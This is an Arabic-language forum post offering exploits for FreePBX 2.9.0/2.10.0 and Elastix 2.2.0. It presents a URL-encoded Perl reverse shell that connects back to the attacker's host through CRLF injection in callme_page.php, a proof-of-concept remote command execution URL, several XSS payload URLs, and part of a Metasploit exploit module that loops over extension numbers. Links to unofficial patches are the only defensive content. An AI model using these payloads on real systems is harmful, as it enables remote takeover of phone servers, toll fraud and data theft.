آخر ثغرات لل FreePBX 2.10.0, 2.9.0 / Elastix 2.2.0

السلام عليكم ورحمة الله وبركاته

اخواني الكرام الموضوع باختصار هو لاخر ثغرات موجودة للفري ببي اكس والالستكس

FreePBX 2.10.0 / Elastix 2.2.0

وهي اخر ثغرات موجودة لهذي الانواع ولايوجد بعدها

 # Reverse shell payload
 
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

  Unofficial Patch (RCE, tested with 2.9.0):
 
Patch htdocs/recordings/modules/callme_page.php:
http://pastebin.com/ZbX50qaZ
Patch htdocs/recordings/modules/voicemail.module:
http://pastebin.com/vv3qczfC

Proof of Concept:
 
RCE:
[HOST]/recordings/misc/callme_page.php?action=c&callmenum=[PHONENUMBER]@from
-internal/n%0D%0AApplication:%20system%0D%0AData:%20[CMD]%0D%0A%0D%0A
 
XSS (2.9.0 and perhaps other versions):
[HOST]/panel/index_amp.php?context=[XSS]
[HOST]/panel/flash/mypage.php?clid=[XSS]
[HOST]/panel/flash/mypage.php?clidname=[base64_encode(XSS)]
[HOST]/panel/dhtml/index.php?context=/../%00">[XSS]
[HOST]/admin/views/freepbx_reload.php/"</script>[XSS]
[HOST]/recordings/index.php?login='>[XSS]
 
 

'Platform'       => ['unix'],
            'Arch'           => ARCH_CMD,
            'Privileged'     => false,
            'Payload'        =>
                {
                    'Space'       => 1024,
                    'DisableNops' => true,
                },
            'Targets'        =>
                [
                    [ 'Automatic Target', { }]
                ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Mar 20 2012'))
 
        register_options(
            [
                OptString.new("EXTENSION", [ true, "A range of Local extension numbers", "0-100" ]),
            ], self.class)
    end
 
    def exploit
        # Check range input
        if datastore['EXTENSION'] =~ /^(\d+)\-(\d+)$/
            min = $1.to_i
            max = $2.to_i
        else
            print_error("Please specify a range for option 'EXTENSION'")
            return
        end
 
        cmd = Rex::Text.uri_encode(payload.encoded)
 
        (min..max).each do |e|
            connect
            print_status("#{rhost}:#{rport} - Sending evil request with range #{e.to_s}")
            res = send_request_raw({
                'method' => 'GET',
                'uri' => "/recordings/misc/callme_page.php?action=c&callmenum="+e.to_s+"@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20#{cmd}%0D%0A%0D%0A",
                'version' => '1.0',
                'vhost'   => rhost
            })
            handler
            disconnect
        end
    end
 
end